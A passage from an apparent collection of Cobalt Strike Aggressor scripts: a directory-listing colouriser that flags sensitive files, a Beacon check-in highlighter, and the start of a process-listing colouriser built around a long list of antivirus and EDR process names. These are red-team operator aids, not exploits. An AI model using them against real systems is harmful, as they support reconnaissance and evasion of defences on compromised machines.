'dotx', 'dotm', 'docm', 'xlam', 'xll', 'xlm', 'xlsm', 'xltx', 'msg', 'rtf', 'txt', 'pdf', 'docx', 'doc', 'xls', 'xlsx', 'ppt', 'pptx', 'pptm', 'odp', 'ppsm', 'ppa', 'ppam'); 61 | @sources = @('cpp', 'md', 'h', 'hpp', 'c', 'pl', 'sql', 'php', 'py', 'java', 'rb', 62 | 'html', 'js', 'css', 'asp', 'aspx', 'cs', 'vbs', 'vbe', 'jse', 'ps1', 'sln', 'vcxproj', 'csproj', 'gitignore', 'gitmodules', 'gitattributes'); 63 | 64 | 65 | if($once < $TIMES_TO_DISPLAY_COLORS_SCHEME) { 66 | $outls .= "\cC[*]\o Colors scheme:\n"; 67 | $outls .= "\cC[*]\o ---------------------------\n"; 68 | $outls .= "\cC[*]\o Directories: \c8 YELLOW \o\n"; 69 | $outls .= "\cC[*]\o Cobalt Strike Uploaded Files: \cBBLUE\o\n"; 70 | $outls .= "\cC[*]\o Sensitive files: \c4 RED \o\n"; 71 | $outls .= "\cC[*]\o Configuration files: \c3 DARK GREEN \o\n"; 72 | $outls .= "\cC[*]\o Archives: \c7 ORANGE \o\n"; 73 | $outls .= "\cC[*]\o Source codes: \cC DARK BLUE \o\n"; 74 | $outls .= "\cC[*]\o Executables: \cD MAGENTA \o\n"; 75 | $outls .= "\cC[*]\o Documents: \c9 GREEN \o\n"; 76 | $once += 1; 77 | } 78 | 79 | $outls .= "\c9[+]\o Location: \cC" . @lines[0] . "\o\n\n"; 80 | $outls .= " Size Type Last Modified Name\n"; 81 | $outls .= " ---- ---- ------------------- ----\n"; 82 | 83 | @subl = sublist(@lines, 1); 84 | $totalsize = 0; 85 | 86 | foreach $temp (@subl) { 87 | ($type, $s, $lastmod, $name) = split("\t", $temp); 88 | 89 | if ($name eq "." || $name eq "..") { 90 | continue; 91 | } 92 | 93 | if($type eq "D") { $type = "dir"; } 94 | else if($type eq "F") { $type = "fil"; } 95 | 96 | $s = int($s); 97 | $totalsize += $s; 98 | $size = interpretSize($s); 99 | 100 | $dotpos = lindexOf($name, '.'); 101 | $ext = ""; 102 | if(($dotpos) ) { 103 | $ext = lc(substr($name, $dotpos + 1)); 104 | } 105 | 106 | if($type eq "dir") { 107 | # Directories in YELLOW 108 | push(@ls, %(type => $type, name => $name, entry => "\c8 $[10]size $[7]type\o $[21]lastmod\c8 $name \o")); 109 | } 110 | else if($name in @UPLOADED_FILE_NAMES) { 111 | # Uploaded Files through Cobalt Strike (the ones we still keep track off) in Blue 112 | push(@ls, %(type => $type, name => $name, entry => "\cB $[10]size $[7]type\o $[21]lastmod\cB $name $+ \o")); 113 | } 114 | else if(($ext in @sensitive) || (lc($name) in @sensitive_files)) { 115 | # Sensitive files in Red 116 | push(@ls, %(type => $type, name => $name, entry => "\c4 $[10]size $[7]type\o $[21]lastmod\c4 $name \o")); 117 | } 118 | else if($ext in @exes) { 119 | # Executables in Magenta 120 | push(@ls, %(type => $type, name => $name, entry => "\cD $[10]size $[7]type\o $[21]lastmod\cD $name \o")); 121 | } 122 | else if($ext in @interesting) { 123 | # Configuration files in Dark Green 124 | push(@ls, %(type => $type, name => $name, entry => "\c3 $[10]size $[7]type\o $[21]lastmod\c3 $name \o")); 125 | } 126 | else if($ext in @sources) { 127 | # Source codes in Dark Blue 128 | push(@ls, %(type => $type, name => $name, entry => "\cC $[10]size $[7]type\o $[21]lastmod\cC $name \o")); 129 | } 130 | else if($ext in @archives) { 131 | # Archives in Orange 132 | push(@ls, %(type => $type, name => $name, entry => "\c7 $[10]size $[7]type\o $[21]lastmod\c7 $name \o")); 133 | } 134 | else if($ext in @docs) { 135 | # Documents in Green 136 | push(@ls, %(type => $type, name => $name, entry => "\c9 $[10]size $[7]type\o $[21]lastmod\c9 $name \o")); 137 | } 138 | else { 139 | push(@ls, %(type => $type, name => $name, entry => " $[10]size $[7]type $[21]lastmod $name \o")); 140 | } 141 | } 142 | 143 | sort({ return ($1['type'] cmp $2['type']); }, @ls); 144 | 145 | foreach $temp (@ls) { 146 | $outls .= $temp['entry'] . "\n"; 147 | } 148 | 149 | $totalsize = interpretSize($totalsize); 150 | $outls .= "\nFiles and dirs count: " . size(@ls) . ", total size of files: $totalsize \n"; 151 | return $outls; 152 | } 153 | 154 | sub collectUploadedFiles { 155 | local('%entry %archives'); 156 | %archives = data_query('archives'); 157 | if(size(%archives) == 0) { 158 | return; 159 | } 160 | 161 | foreach %entry (%archives) { 162 | if (%entry['type'] ne "task") { 163 | continue; 164 | } 165 | 166 | if(indexOf(%entry['data'], "upload ") == 0) { 167 | if(%entry['data'] ismatch '^upload ("[^"]+"|[^\s]+) as ("[^"]+"|[^\s]+)$') { 168 | ($from, $to) = matched(); 169 | push(@UPLOADED_FILE_NAMES, getFileName($to)); 170 | } 171 | } 172 | } 173 | } 174 | 175 | on beacon_tasked { 176 | local('$from $to'); 177 | 178 | if($2 ismatch 'Tasked beacon to upload ("[^"]+"|[^\s]+) as (.+)') { 179 | ($from, $to) = matched(); 180 | push(@UPLOADED_FILE_NAMES, getFileName($to)); 181 | } 182 | } 183 | 184 | on beacon_input { 185 | local('$from $to'); 186 | 187 | if ($3 ismatch '^upload2? ("[^"]+"|[^\s]+) ?("[^"]+"|[^\s]+)?$') { 188 | ($from, $to) = matched(); 189 | push(@UPLOADED_FILE_NAMES, getFileName($to)); 190 | } 191 | 192 | # Remove file track as the file was requested to be deleted 193 | #else if ($3 ismatch '(?:shell|powershell|run) del (\w+)') { 194 | # ($from) = matched(); 195 | # $from = getFileName($from); 196 | # if($from in @UPLOADED_FILE_NAMES) { 197 | # remove(@UPLOADED_FILE_NAMES, $from); 198 | # } 199 | #} 200 | } 201 | 202 | collectUploadedFiles(); 203 | -------------------------------------------------------------------------------- /scripts/cmd/Highlight_Beacons.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Highlights new checking-in Beacons green and these exiting ones red for a defined time. 3 | # 4 | # Author: 5 | # Mariusz B. / mgeeky, "20 6 | # 7 | # (https://github.com/mgeeky) 8 | # 9 | 10 | global('%KNOWN_BEACONS $HIGHLIGHT_DURATION %HIGHLIGHTS'); 11 | 12 | # Hightlight duration expressed in miliseconds 13 | $HIGHLIGHT_DURATION = 5000; 14 | 15 | %HIGHLIGHTS = %( 16 | initial => "good", 17 | exit => "bad", 18 | exited => "ignore", 19 | error => "neutral", 20 | output => "" 21 | ); 22 | 23 | # --------------------------------------- 24 | # Do not alter variables below this point 25 | 26 | %KNOWN_BEACONS = %(); 27 | 28 | sub getBeaconEntry { 29 | return @(bdata($1)); 30 | } 31 | 32 | sub highlightBeacon { 33 | local('@entry $bid $col $cur'); 34 | (@entry, $bid, $col) = @_; 35 | $cur = binfo($bid, "_accent"); 36 | 37 | if($cur ne %HIGHLIGHTS[$col]) { 38 | %KNOWN_BEACONS[$bid]["prev-accent"] = $cur; 39 | highlight("beacons", @entry, %HIGHLIGHTS[$col]); 40 | } 41 | } 42 | 43 | on beacon_initial { 44 | local('@entry'); 45 | 46 | if($1 in keys(%KNOWN_BEACONS)) { 47 | return; 48 | } 49 | 50 | %KNOWN_BEACONS[$1] = %(); 51 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 52 | 53 | @entry = getBeaconEntry($1); 54 | if(@entry) { 55 | %KNOWN_BEACONS[$1]["status"] = 'initial'; 56 | highlightBeacon(@entry, $1, "initial"); 57 | } 58 | } 59 | 60 | on beacon_output { 61 | local('@entry'); 62 | 63 | if($1 !in keys(%KNOWN_BEACONS)) { 64 | %KNOWN_BEACONS[$1] = %(); 65 | } 66 | 67 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 68 | 69 | @entry = getBeaconEntry($1); 70 | if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) { 71 | highlightBeacon(@entry, $1, "output"); 72 | } 73 | } 74 | 75 | # doesn't work for some reason. 76 | on beacon_output_alt { 77 | local('@entry'); 78 | 79 | if($1 !in keys(%KNOWN_BEACONS)) { 80 | %KNOWN_BEACONS[$1] = %(); 81 | } 82 | 83 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 84 | 85 | @entry = getBeaconEntry($1); 86 | if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) { 87 | highlightBeacon(@entry, $1, "output"); 88 | } 89 | } 90 | 91 | on beacon_error { 92 | local('@entry'); 93 | 94 | if($1 !in keys(%KNOWN_BEACONS)) { 95 | %KNOWN_BEACONS[$1] = %(); 96 | } 97 | 98 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 99 | 100 | @entry = getBeaconEntry($1); 101 | if(@entry && (%HIGHLIGHTS["error"] ne "")) { 102 | %KNOWN_BEACONS[$1]["status"] = 'error'; 103 | highlightBeacon(@entry, $1, "error"); 104 | } 105 | } 106 | 107 | on beacon_input { 108 | local('@entry'); 109 | 110 | if($1 !in keys(%KNOWN_BEACONS)) { 111 | %KNOWN_BEACONS[$1] = %(); 112 | } 113 | 114 | if ($3 eq "exit") { 115 | %KNOWN_BEACONS[$1]["ticks"] = ticks(); 116 | @entry = getBeaconEntry($1); 117 | if(@entry) { 118 | %KNOWN_BEACONS[$1]["status"] = 'exiting'; 119 | highlightBeacon(@entry, $1, "exit"); 120 | } 121 | 122 | remove(%KNOWN_BEACONS, %KNOWN_BEACONS[$1]); 123 | } 124 | } 125 | 126 | on heartbeat_1s { 127 | local('$diff $b @entry'); 128 | 129 | foreach $bid (keys(%KNOWN_BEACONS)) { 130 | $b = %KNOWN_BEACONS[$bid]; 131 | if("ticks" in keys($b)) { 132 | if(strlen($b["ticks"]) > 0) { 133 | $diff = ticks() - $b["ticks"]; 134 | if($diff >= $HIGHLIGHT_DURATION) { 135 | @entry = getBeaconEntry($bid); 136 | if(@entry) { 137 | if(%KNOWN_BEACONS[$bid]["status"] eq "exiting") { 138 | %KNOWN_BEACONS[$1]["status"] = 'exited'; 139 | highlightBeacon(@entry, $bid, "exited"); 140 | } 141 | else { 142 | #%KNOWN_BEACONS[$bid]["prev-accent"] = binfo($1, "_accent"); 143 | highlight("beacons", @entry, %KNOWN_BEACONS[$bid]["prev-accent"]); 144 | %KNOWN_BEACONS[$1]["status"] = ""; 145 | } 146 | } 147 | 148 | %KNOWN_BEACONS[$bid]["ticks"] = ""; 149 | } 150 | } 151 | } 152 | } 153 | } 154 | -------------------------------------------------------------------------------- /scripts/cmd/ProcessColor.cna: -------------------------------------------------------------------------------- 1 | #Color Coded Process Listing 2 | #Author: @r3dQu1nn 3 | #Takes the PS output in CS and color codes all AV processes, explorer process, browsers processes, and current process running 4 | #Thanks to @oldb00t for creating the original beacon-ps-highlight.cna script! Script here: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight 5 | #This script removes the need for the av_hips_executables.txt requirement 6 | 7 | set BEACON_OUTPUT_PS { 8 | 9 | $bd = bdata($1); 10 | @av = @("Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", "AvastUI.exe", "Avconsol.exe", "AvpM.exe", "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", "EndPointSecurity.exe", "EngineServer.exe", "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", "FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", "MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", "McWCECfg.exe", "Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", "PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", "PavPrSrv.exe", "PavProt.exe", "PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", "RPCServ.exe", "RSSensor.exe", "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", "SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", "TSAnSrf.exe", "TSAtiSy.exe", "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", "UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", "ants.exe", "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", "avadmin.exe", "avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", "avgnsx.exe", "avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", "backweb.exe", "bargains.exe", "basfipm.exe", "bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", "ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", "cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", "dllreg.exe", "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", "drweb386.exe", "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", "evtProcessEcFile.exe", "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", "fortifw.exe", "fp-win.exe", "fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", "hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", "inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", "kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe", "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe", "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", "kis.exe", "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe", "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe", "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe", "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe", "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", 